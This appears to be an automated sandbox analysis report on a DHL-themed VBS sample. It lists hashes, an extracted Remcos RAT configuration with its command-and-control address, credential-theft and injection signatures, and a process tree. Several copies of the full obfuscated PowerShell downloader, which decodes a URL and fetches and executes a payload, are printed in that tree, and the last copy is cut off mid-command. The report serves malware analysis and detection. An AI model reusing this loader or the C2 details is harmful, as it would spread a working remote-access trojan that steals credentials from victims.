Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-10-2024 15:04
Static task
static1
Behavioral task
behavioral1
Sample
DHL1x20LY0736449574.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DHL1x20LY0736449574.vbs
Resource
win10v2004-20241007-en
General
-
Target
DHL1x20LY0736449574.vbs
-
Size
215KB
-
MD5
1e13b1cfc831ed2d5540f088b2d9b5cc
-
SHA1
5fe91312509f191c90bc52c4561652522a336573
-
SHA256
07b2a32cf575dfe3b0158d36d7ffd9d9e256339f8d0f8d8a99e3a7f00d25f658
-
SHA512
6a119f54689fb6fbe332a440e3be997eba8189fa9a0b8b2d39e9c5adb11dbdfd7322ed2f83f3157812da0b0a2fb0d3a6d6e6145c2b093f713d8cf009c7ab46e2
-
SSDEEP
6144:rAOTDoRQRWAgAHNSjH1EWMS/RT/Sfj986x8WIERjNNkSkwwihiW3J0GYeduNvbdb:WlH6z0T2z6
Malware Config
Extracted
remcos
RemoteHost
185.174.101.182:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-QD9L69
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/3696-82-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4732-83-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3592-81-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3696-82-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4732-83-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 10 IoCs
flow pid Process 2 1984 WScript.exe 15 3008 powershell.exe 23 1868 msiexec.exe 34 1868 msiexec.exe 36 1868 msiexec.exe 37 1868 msiexec.exe 38 1868 msiexec.exe 40 1868 msiexec.exe 42 1868 msiexec.exe 44 3996 msiexec.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1868 msiexec.exe 3996 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4364 powershell.exe 1868 msiexec.exe 1392 powershell.exe 3996 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1868 set thread context of 4732 1868 msiexec.exe 101 PID 1868 set thread context of 3696 1868 msiexec.exe 102 PID 1868 set thread context of 3592 1868 msiexec.exe 103 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings msiexec.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 3008 powershell.exe 3008 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 1392 powershell.exe 1392 powershell.exe 1392 powershell.exe 3592 msiexec.exe 3592 msiexec.exe 4732 msiexec.exe 4732 msiexec.exe 4732 msiexec.exe 4732 msiexec.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 4364 powershell.exe 1868 msiexec.exe 1868 msiexec.exe 1868 msiexec.exe 1392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 4364 powershell.exe Token: SeDebugPrivilege 1392 powershell.exe Token: SeDebugPrivilege 3592 msiexec.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1984 wrote to memory of 3008 1984 WScript.exe 87 PID 1984 wrote to memory of 3008 1984 WScript.exe 87 PID 4364 wrote to memory of 1868 4364 powershell.exe 92 PID 4364 wrote to memory of 1868 4364 powershell.exe 92 PID 4364 wrote to memory of 1868 4364 powershell.exe 92 PID 4364 wrote to memory of 1868 4364 powershell.exe 92 PID 1868 wrote to memory of 1624 1868 msiexec.exe 97 PID 1868 wrote to memory of 1624 1868 msiexec.exe 97 PID 1868 wrote to memory of 1624 1868 msiexec.exe 97 PID 1624 wrote to memory of 1392 1624 WScript.exe 98 PID 1624 wrote to memory of 1392 1624 WScript.exe 98 PID 1624 wrote to memory of 1392 1624 WScript.exe 98 PID 1868 wrote to memory of 4732 1868 msiexec.exe 101 PID 1868 wrote to memory of 4732 1868 msiexec.exe 101 PID 1868 wrote to memory of 4732 1868 msiexec.exe 101 PID 1868 wrote to memory of 4732 1868 msiexec.exe 101 PID 1868 wrote to memory of 3696 1868 msiexec.exe 102 PID 1868 wrote to memory of 3696 1868 msiexec.exe 102 PID 1868 wrote to memory of 3696 1868 msiexec.exe 102 PID 1868 wrote to memory of 3696 1868 msiexec.exe 102 PID 1868 wrote to memory of 3592 1868 msiexec.exe 103 PID 1868 wrote to memory of 3592 1868 msiexec.exe 103 PID 1868 wrote to memory of 3592 1868 msiexec.exe 103 PID 1868 wrote to memory of 3592 1868 msiexec.exe 103 PID 1392 wrote to memory of 3996 1392 powershell.exe 104 PID 1392 wrote to memory of 3996 1392 powershell.exe 104 PID 1392 wrote to memory of 3996 1392 powershell.exe 104 PID 1392 wrote to memory of 3996 1392 powershell.exe 104
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL1x20LY0736449574.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Absently Overimbibed skruestikker Brde Matrixerne #>;$tabulatorindstillings='snkloddenes';<#Homeozoic swound Unestranged spaakllingers Pittston #>;$Primaveksler=$Byrthynsak+$host.UI;If ($Primaveksler) {$Overreplete++;}function Tropotaxis($salgsmulighedens){$nonactivator=$Caraibisk+$salgsmulighedens.Length-$Overreplete; for( $versionise=3;$versionise -lt $nonactivator;$versionise+=4){$Trusserederi='Aandsstyrkes';$Vidkids+=$salgsmulighedens[$versionise];$Lufttransport='Paramedicinsk';}$Vidkids;}function spaliets253($Anatomen){ . ($Grandmothers) ($Anatomen);}$versionisencompletability=Tropotaxis 'subM h oEvezLibi P l sylMula Dr/Blg5Tje.Mo 0Wit spe(EleW.lei inO edM.ooso wU.psAge mytNP,rTArk isl1 u0Myo.Aa 0unc;l e ,goWLseiNonn Pe6sli4 st;,ec ForxNon6 Op4Moo;fir Diar Lev Zo:sva1Dyr2 s 1Kdb.Rul0In ) nt F Gcauestec UdksikoAnn/ sw2Unb0Bri1kol0 pp0gi 1Ect0Dor1sum M,F iiHjer eneLngfMano ntxMil/sne1 Da2Usu1 Te. Rm0Pop ';$Glucoprotein=Tropotaxis 'AppUExts oue UprBet-Wara GeGBedEMo.NTraTUfo ';$Ballademager=Tropotaxis ' EshA.ytThytCompNem:spe/hj /Ma,pLydas nuProl urjUdso mrnBuleMeas,eur,tjefreaQualJact K y ch. Uncaumostjm An. aga Udu ,i/H maBloa Gl2Lg /A.iU m n lefWinoNe u utnKnod v.KatmP adFulpBec ';$sycosis=Tropotaxis 'Alv>,eg ';$Grandmothers=Tropotaxis 'D fITipE BixTe ';$versionisendianajones='Tebordene';$dagpengeydelsers='\Domkirken40.Kon';spaliets253 (Tropotaxis ' Ap$TalG InlsmaOBlabForaRigLMin: Taa riL L tU ssCyktDrkEO.kMNeuMP sEnetrs iN TaEPy,sKul2Mad3 U 9sc,= Ph$Vale riNNonVUnt: TiAst,P up adAppAResTM.cADat+ sa$ Bed,osaRerG apse e NiNClagstre.ksYkaldsphe EflTi.s are aaREdgsAus ');spaliets253 (Tropotaxis ' Mi$BargFnil ncOF,kBKibA DiLCoa: orsstoU s,l ElFslea CytsepiDisZm rE hr= An$k ib.yraBu L Colkida ucdslie.nsMEmbaChagP eeOverAu,.F asrygPBlulblaiEndtAcc(din$uncs Dry.awCEtaoKissJvniUdpsCen) A. ');spaliets253 (Tropotaxis 'P,y[BerNB,uE Kot In.Fess aoEPi,rFo vAntisocC.ejeR,nPTr oAdrisninsevts oMPolaC enskaAPatgBrne AtRRee]Eft:s k:.onsAdaeVitc .oUH drImpI HytRefy TvPForr s ORehtD,cO FocattostiLNat syn=Hy. bl [ Pon V E sttsm..phtspr,ElevCBedu ksr ngIsuctstayUn PMasR.ekOtegt ,noPleCJapO ZeLKistBonyFu p lee ,o]Ma,:Run:DrfTlolL DisBe.1 un2syd ');$Ballademager=$sulfatize[0];$Begavelser=(Tropotaxis 'En $ ocGE clRutoO eBGenAParL st: PaddinIUdmsstjEN.nnbusT DeAColn VagJanl LeeOp m skeBuzN s ts ts O = MiNCaoeWehwKor-AeroForBAg j heE stCGr tAnn J.sPr y AgsCu tTapE nmMit.Tr N AnE GeT t.BrsWUdeeAenbN,nc heL L i I.E ufnTilTHnn ');spaliets253 ($Begavelser);spaliets253 (Tropotaxis ' s $MerDL mi Tisparela n,kitBs aortn ,pg arlRhee ugm CreBurnGritRegsTop.Mi H yoeY ea CadCrueRegrAmysMil[Bil$ConGusil Mou .icFi oI,tpForrspyoTumt ase vii skn Fo] .o= Vi$ EnvOuteAr,rM.ts Glisvao,ransubi isKe eBi,nUntcBaroso.mBegps,ll,nfeRegtHusaMalbGr i ,ulArtiUnctstyy e ');$mudstone=Tropotaxis '.no$Re.D MiiNedsM.le Unn.ect AfaUnin Elg gel Ble,anmPhoeEntnBj t susAnd.Un DHeloKl.wReln C lsaloToraschdAdvFAn i Ekl Coesom( al$silB ,daAntl nl ehaDksdFroeTo,m.alaEargK ue ir Mu, Fo$Hems,neaC imUl.fTorusprnDoldDrosE iaGibnInssUdmvLynaTj rs.ie betAm.sdom),er ';$samfundsansvarets=$Altstemmernes239;spaliets253 (Tropotaxis 'Mas$TrsGUnblPreO spb la orl Au: EnpP.lR TeEDifvEp,=rea(skoT ureH lsTontVer- apAf AIndtEgoHFr Eyl$ Mas K,a l msujfoarUpsyn ged.onsBl AKluNOppsPervs faIonRVelePsiT snsseg)sl ');while (!$Prev) {spaliets253 (Tropotaxis 'uss$ Dug F.lHa oCitbD iaserlsol:sidvU arB,rdjanis an UndUner T i ,unDung Te=sub$In tNonrTrauL ceTar ') ;spaliets253 $mudstone;spaliets253 (Tropotaxis 'Tons,emTColAFelrLogTsp.-auts.ivLOroEPsyE TipUdl Pl4Joy ');spaliets253 (Tropotaxis 'Fo $Ceng unlRekoRo b ia elLAmo: LepBycR P E h VGra=Ter(A,ttR gEUd,sRecTMaa-N,tpTibaUfdTZabhRe E,b$,ass V.aK nmHa fOv,ustyNVerdEposRunAM enchosDomvWi AFjeR DoeT.rt FosDat)Ful ') ;spaliets253 (Tropotaxis 'Dis$Vi.GHegL Udo.ambRafa pLRep:Bo c.ubiZeanMr EBitlVan=gru$sangEnclba OCo bPupaModLRa : LuPseloOmdsWantMotsCarCadvaUtrpT tuArbl DraRearRafIunds .u+Be,+Uns%And$ ols Flu VelFlyfslvaR ctPleiFatzst.EExt.Un CDe oOp UGunNVrit .d ') ;$Ballademager=$sulfatize[$Cinel];}$Perseveringly202=311594;$Dissidenter=31225;spaliets253 (Tropotaxis 'Eli$ .dGhislRr ORoeBc,ea rbLTin:UnrKBetI BuRNgss UnT onE UdIunin tr O,=Hyp DonGBefe,ilt Ra-OstCForo siNOplt GieMotnKlat p Ver$Reps .ea ukMOssF,enUJunN,omD K sOveaB.lnLessK rv,ata tRGi,ENonT srssv. ');spaliets253 (Tropotaxis 'In $ Idgs bl.oroMetbsapaauglEve:chaRLgpespov iki nodG ne.lirWige Krs.en Pol=Ra s,m[ I,ss,iy rhsLuntTare anm Y,.A tCTrioMi nKonv ogesprrskrtPre]Far:Bar:PerFNatrsulo C m V BPlaaE.psTjue Go6 ik4KonsAutt Prrsu i ytnAvag an(Ord$staK raistarPolsFortsa ePyriKvanO.e)Des ');spaliets253 (Tropotaxis ' Re$stagPo.L.idOD sbPykaTelLtra: HiUOriNsceo snrskfDT.mI koNOvoaFinT C,EUu ner= sh K,i[c.nsa fY MisOveTscheBogmHaa.dest Mae VixTreTG b. joEmicNFinc skOL pDMoriAfpNOvegs.u] Fy:str:s vApirsHiscPr I ori xp.FdeG U,eParTRinsKhaT H,rBumIRomnRe GA b( Ov$EksRTykEgraVFriiDecDF.re ,or U,EEpissno)Pye ');spaliets253 (Tropotaxis '.la$ H,gCoql ipOOutb egaAntLHom:RundUndACa C UdisamtZesER.n= ov$OveuBilNPe OR,nr A DFu.i ,oNIndAProtsa e.mb.De sErhuThoB udsafrTQ aRsani FrN K gMin( In$LofpFitEManrId s psEHjevud e DiR.onI GoNAttG U LBigYRen2Cha0agt2Fil,Fi.$ siDGaliViksChas ,eI Hud bse suNLe Tde e rRMe )spr ');spaliets253 $Dacite;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Absently Overimbibed skruestikker Brde Matrixerne #>;$tabulatorindstillings='snkloddenes';<#Homeozoic swound Unestranged spaakllingers Pittston #>;$Primaveksler=$Byrthynsak+$host.UI;If ($Primaveksler) {$Overreplete++;}function Tropotaxis($salgsmulighedens){$nonactivator=$Caraibisk+$salgsmulighedens.Length-$Overreplete; for( $versionise=3;$versionise -lt $nonactivator;$versionise+=4){$Trusserederi='Aandsstyrkes';$Vidkids+=$salgsmulighedens[$versionise];$Lufttransport='Paramedicinsk';}$Vidkids;}function spaliets253($Anatomen){ . ($Grandmothers) ($Anatomen);}$versionisencompletability=Tropotaxis 'subM h oEvezLibi P l sylMula Dr/Blg5Tje.Mo 0Wit spe(EleW.lei inO edM.ooso wU.psAge mytNP,rTArk isl1 u0Myo.Aa 0unc;l e ,goWLseiNonn Pe6sli4 st;,ec ForxNon6 Op4Moo;fir Diar Lev Zo:sva1Dyr2 s 1Kdb.Rul0In ) nt F Gcauestec UdksikoAnn/ sw2Unb0Bri1kol0 pp0gi 1Ect0Dor1sum M,F iiHjer eneLngfMano ntxMil/sne1 Da2Usu1 Te. Rm0Pop ';$Glucoprotein=Tropotaxis 'AppUExts oue UprBet-Wara GeGBedEMo.NTraTUfo ';$Ballademager=Tropotaxis ' EshA.ytThytCompNem:spe/hj /Ma,pLydas nuProl urjUdso mrnBuleMeas,eur,tjefreaQualJact K y ch. Uncaumostjm An. aga Udu ,i/H maBloa Gl2Lg /A.iU m n lefWinoNe u utnKnod v.KatmP adFulpBec ';$sycosis=Tropotaxis 'Alv>,eg ';$Grandmothers=Tropotaxis 'D fITipE BixTe ';$versionisendianajones='Tebordene';$dagpengeydelsers='\Domkirken40.Kon';spaliets253 (Tropotaxis ' Ap$TalG InlsmaOBlabForaRigLMin: Taa riL L tU ssCyktDrkEO.kMNeuMP sEnetrs iN TaEPy,sKul2Mad3 U 9sc,= Ph$Vale riNNonVUnt: TiAst,P up adAppAResTM.cADat+ sa$ Bed,osaRerG apse e NiNClagstre.ksYkaldsphe EflTi.s are aaREdgsAus ');spaliets253 (Tropotaxis ' Mi$BargFnil ncOF,kBKibA DiLCoa: orsstoU s,l ElFslea CytsepiDisZm rE hr= An$k ib.yraBu L Colkida ucdslie.nsMEmbaChagP eeOverAu,.F asrygPBlulblaiEndtAcc(din$uncs Dry.awCEtaoKissJvniUdpsCen) A. ');spaliets253 (Tropotaxis 'P,y[BerNB,uE Kot In.Fess aoEPi,rFo vAntisocC.ejeR,nPTr oAdrisninsevts oMPolaC enskaAPatgBrne AtRRee]Eft:s k:.onsAdaeVitc .oUH drImpI HytRefy TvPForr s ORehtD,cO FocattostiLNat syn=Hy. bl [ Pon V E sttsm..phtspr,ElevCBedu ksr ngIsuctstayUn PMasR.ekOtegt ,noPleCJapO ZeLKistBonyFu p lee ,o]Ma,:Run:DrfTlolL DisBe.1 un2syd ');$Ballademager=$sulfatize[0];$Begavelser=(Tropotaxis 'En $ ocGE clRutoO eBGenAParL st: PaddinIUdmsstjEN.nnbusT DeAColn VagJanl LeeOp m skeBuzN s ts ts O = MiNCaoeWehwKor-AeroForBAg j heE stCGr tAnn J.sPr y AgsCu tTapE nmMit.Tr N AnE GeT t.BrsWUdeeAenbN,nc heL L i I.E ufnTilTHnn ');spaliets253 ($Begavelser);spaliets253 (Tropotaxis ' s $MerDL mi Tisparela n,kitBs aortn ,pg arlRhee ugm CreBurnGritRegsTop.Mi H yoeY ea CadCrueRegrAmysMil[Bil$ConGusil Mou .icFi oI,tpForrspyoTumt ase vii skn Fo] .o= Vi$ EnvOuteAr,rM.ts Glisvao,ransubi isKe eBi,nUntcBaroso.mBegps,ll,nfeRegtHusaMalbGr i ,ulArtiUnctstyy e ');$mudstone=Tropotaxis '.no$Re.D MiiNedsM.le Unn.ect AfaUnin Elg gel Ble,anmPhoeEntnBj t susAnd.Un DHeloKl.wReln C lsaloToraschdAdvFAn i Ekl Coesom( al$silB ,daAntl nl ehaDksdFroeTo,m.alaEargK ue ir Mu, Fo$Hems,neaC imUl.fTorusprnDoldDrosE iaGibnInssUdmvLynaTj rs.ie betAm.sdom),er ';$samfundsansvarets=$Altstemmernes239;spaliets253 (Tropotaxis 'Mas$TrsGUnblPreO spb la orl Au: EnpP.lR TeEDifvEp,=rea(skoT ureH lsTontVer- apAf AIndtEgoHFr Eyl$ Mas K,a l msujfoarUpsyn ged.onsBl AKluNOppsPervs faIonRVelePsiT snsseg)sl ');while (!$Prev) {spaliets253 (Tropotaxis 'uss$ Dug F.lHa oCitbD iaserlsol:sidvU arB,rdjanis an UndUner T i ,unDung Te=sub$In tNonrTrauL ceTar ') ;spaliets253 $mudstone;spaliets253 (Tropotaxis 'Tons,emTColAFelrLogTsp.-auts.ivLOroEPsyE TipUdl Pl4Joy ');spaliets253 (Tropotaxis 'Fo $Ceng unlRekoRo b ia elLAmo: LepBycR P E h VGra=Ter(A,ttR gEUd,sRecTMaa-N,tpTibaUfdTZabhRe E,b$,ass V.aK nmHa fOv,ustyNVerdEposRunAM enchosDomvWi AFjeR DoeT.rt FosDat)Ful ') ;spaliets253 (Tropotaxis 'Dis$Vi.GHegL Udo.ambRafa pLRep:Bo c.ubiZeanMr EBitlVan=gru$sangEnclba OCo bPupaModLRa : LuPseloOmdsWantMotsCarCadvaUtrpT tuArbl DraRearRafIunds .u+Be,+Uns%And$ ols Flu VelFlyfslvaR ctPleiFatzst.EExt.Un CDe oOp UGunNVrit .d ') ;$Ballademager=$sulfatize[$Cinel];}$Perseveringly202=311594;$Dissidenter=31225;spaliets253 (Tropotaxis 'Eli$ .dGhislRr ORoeBc,ea rbLTin:UnrKBetI BuRNgss UnT onE UdIunin tr O,=Hyp DonGBefe,ilt Ra-OstCForo siNOplt GieMotnKlat p Ver$Reps .ea ukMOssF,enUJunN,omD K sOveaB.lnLessK rv,ata tRGi,ENonT srssv. ');spaliets253 (Tropotaxis 'In $ Idgs bl.oroMetbsapaauglEve:chaRLgpespov iki nodG ne.lirWige Krs.en Pol=Ra s,m[ I,ss,iy rhsLuntTare anm Y,.A tCTrioMi nKonv ogesprrskrtPre]Far:Bar:PerFNatrsulo C m V BPlaaE.psTjue Go6 ik4KonsAutt Prrsu i ytnAvag an(Ord$staK raistarPolsFortsa ePyriKvanO.e)Des ');spaliets253 (Tropotaxis ' Re$stagPo.L.idOD sbPykaTelLtra: HiUOriNsceo snrskfDT.mI koNOvoaFinT C,EUu ner= sh K,i[c.nsa fY MisOveTscheBogmHaa.dest Mae VixTreTG b. joEmicNFinc skOL pDMoriAfpNOvegs.u] Fy:str:s vApirsHiscPr I ori xp.FdeG U,eParTRinsKhaT H,rBumIRomnRe GA b( Ov$EksRTykEgraVFriiDecDF.re ,or U,EEpissno)Pye ');spaliets253 (Tropotaxis '.la$ H,gCoql ipOOutb egaAntLHom:RundUndACa C UdisamtZesER.n= ov$OveuBilNPe OR,nr A DFu.i ,oNIndAProtsa e.mb.De sErhuThoB udsafrTQ aRsani FrN K gMin( In$LofpFitEManrId s psEHjevud e DiR.onI GoNAttG U LBigYRen2Cha0agt2Fil,Fi.$ siDGaliViksChas ,eI Hud bse suNLe Tde e rRMe )spr ');spaliets253 $Dacite;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\syswow64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1x20LY0736449574.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Absently Overimbibed skruestikker Brde Matrixerne #>;$tabulatorindstillings='snkloddenes';<#Homeozoic swound Unestranged spaakllingers Pittston #>;$Primaveksler=$Byrthynsak+$host.UI;If ($Primaveksler) {$Overreplete++;}function Tropotaxis($salgsmulighedens){$nonactivator=$Caraibisk+$salgsmulighedens.Length-$Overreplete; for( $versionise=3;$versionise -lt $nonactivator;$versionise+=4){$Trusserederi='Aandsstyrkes';$Vidkids+=$salgsmulighedens[$versionise];$Lufttransport='Paramedicinsk';}$Vidkids;}function spaliets253($Anatomen){ . ($Grandmothers) ($Anatomen);}$versionisencompletability=Tropotaxis 'subM h oEvezLibi P l sylMula Dr/Blg5Tje.Mo 0Wit spe(EleW.lei inO edM.ooso wU.psAge mytNP,rTArk isl1 u0Myo.Aa 0unc;l e ,goWLseiNonn Pe6sli4 st;,ec ForxNon6 Op4Moo;fir Diar Lev Zo:sva1Dyr2 s 1Kdb.Rul0In ) nt F Gcauestec UdksikoAnn/ sw2Unb0Bri1kol0 pp0gi 1Ect0Dor1sum M,F iiHjer eneLngfMano ntxMil/sne1 Da2Usu1 Te. Rm0Pop ';$Glucoprotein=Tropotaxis 'AppUExts oue UprBet-Wara GeGBedEMo.NTraTUfo ';$Ballademager=Tropotaxis ' EshA.ytThytCompNem:spe/hj /Ma,pLydas nuProl urjUdso mrnBuleMeas,eur,tjefreaQualJact K y ch. Uncaumostjm An. aga Udu ,i/H maBloa Gl2Lg /A.iU m n lefWinoNe u utnKnod v.KatmP adFulpBec ';$sycosis=Tropotaxis 'Alv>,eg ';$Grandmothers=Tropotaxis 'D fITipE BixTe ';$versionisendianajones='Tebordene';$dagpengeydelsers='\Domkirken40.Kon';spaliets253 (Tropotaxis ' Ap$TalG InlsmaOBlabForaRigLMin: Taa riL L tU ssCyktDrkEO.kMNeuMP sEnetrs iN TaEPy,sKul2Mad3 U 9sc,= Ph$Vale riNNonVUnt: TiAst,P up adAppAResTM.cADat+ sa$ Bed,osaRerG apse e NiNClagstre.ksYkaldsphe EflTi.s are aaREdgsAus ');spaliets253 (Tropotaxis ' Mi$BargFnil ncOF,kBKibA DiLCoa: orsstoU s,l ElFslea CytsepiDisZm rE hr= An$k ib.yraBu L Colkida ucdslie.nsMEmbaChagP eeOverAu,.F asrygPBlulblaiEndtAcc(din$uncs Dry.awCEtaoKissJvniUdpsCen) A. ');spaliets253 (Tropotaxis 'P,y[BerNB,uE Kot In.Fess aoEPi,rFo vAntisocC.ejeR,nPTr oAdrisninsevts oMPolaC enskaAPatgBrne AtRRee]Eft:s k:.onsAdaeVitc .oUH drImpI HytRefy TvPForr s ORehtD,cO FocattostiLNat syn=Hy. bl [ Pon V E sttsm..phtspr,ElevCBedu ksr ngIsuctstayUn PMasR.ekOtegt ,noPleCJapO ZeLKistBonyFu p lee ,o]Ma,:Run:DrfTlolL DisBe.1 un2syd ');$Ballademager=$sulfatize[0];$Begavelser=(Tropotaxis 'En $ ocGE clRutoO eBGenAParL st: PaddinIUdmsstjEN.nnbusT DeAColn VagJanl LeeOp m skeBuzN s ts ts O = MiNCaoeWehwKor-AeroForBAg j heE stCGr tAnn J.sPr y AgsCu tTapE nmMit.Tr N AnE GeT t.BrsWUdeeAenbN,nc heL L i I.E ufnTilTHnn ');spaliets253 ($Begavelser);spaliets253 (Tropotaxis ' s $MerDL mi Tisparela n,kitBs aortn ,pg arlRhee ugm CreBurnGritRegsTop.Mi H yoeY ea CadCrueRegrAmysMil[Bil$ConGusil Mou .icFi oI,tpForrspyoTumt ase vii skn Fo] .o= Vi$ EnvOuteAr,rM.ts Glisvao,ransubi isKe eBi,nUntcBaroso.mBegps,ll,nfeRegtHusaMalbGr i ,ulArtiUnctstyy e ');$mudstone=Tropotaxis '.no$Re.D MiiNedsM.le Unn.ect AfaUnin Elg gel Ble,anmPhoeEntnBj t susAnd.Un DHeloKl.wReln C lsaloToraschdAdvFAn i Ekl Coesom( al$silB ,daAntl nl ehaDksdFroeTo,m.alaEargK ue ir Mu, Fo$Hems,neaC imUl.fTorusprnDoldDrosE iaGibnInssUdmvLynaTj rs.ie betAm.sdom),er ';$samfundsansvarets=$Altstemmernes239;spaliets253 (Tropotaxis 'Mas$TrsGUnblPreO spb la orl Au: EnpP.lR TeEDifvEp,=rea(skoT ureH lsTontVer- apAf AIndtEgoHFr Eyl$ Mas K,a l msujfoarUpsyn ged.onsBl AKluNOppsPervs faIonRVelePsiT snsseg)sl ');while (!$Prev) {spaliets253 (Tropotaxis 'uss$ Dug F.lHa oCitbD iaserlsol:sidvU arB,rdjanis an UndUner T i ,unDung Te=sub$In tNonrTrauL ceTar ') ;spaliets253 $mudstone;spaliets253 (Tropotaxis 'Tons,emTColAFelrLogTsp.-auts.ivLOroEPsyE TipUdl Pl4Joy ');spaliets253 (Tropotaxis 'Fo $Ceng unlRekoRo b ia elLAmo: LepBycR P E h VGra=Ter(A,ttR gEUd,sRecTMaa-N,tpTibaUfdTZabhRe E,b$,ass V.aK nmHa fOv,ustyNVerdEposRunAM enchosDomvWi AFjeR DoeT.rt FosDat)Ful ') ;spaliets253 (Tropotaxis 'Dis$Vi.GHegL Udo.ambRafa pLRep:Bo c.ubiZeanMr EBitlVan=gru$sangEnclba OCo bPupaModLRa : LuPseloOmdsWantMotsCarCadvaUtrpT tuArbl DraRearRafIunds .u+Be,+Uns%And$ ols Flu VelFlyfslvaR ctPleiFatzst.EExt.Un CDe oOp UGunNVrit .d ') ;$Ballademager=$sulfatize[$Cinel];}$Perseveringly202=311594;$Dissidenter=31225;spaliets253 (Tropotaxis 'Eli$ .dGhislRr ORoeBc,ea rbLTin:UnrKBetI BuRNgss UnT onE UdIunin tr O,=Hyp DonGBefe,ilt Ra-OstCForo siNOplt GieMotnKlat p Ver$Reps .ea ukMOssF,enUJunN,omD K sOveaB.lnLessK rv,ata tRGi,ENonT srssv. ');spaliets253 (Tropotaxis 'In $ Idgs bl.oroMetbsapaauglEve:chaRLgpespov iki nodG ne.lirWige Krs.en Pol=Ra s,m[ I,ss,iy rhsLuntTare anm Y,.A tCTrioMi nKonv 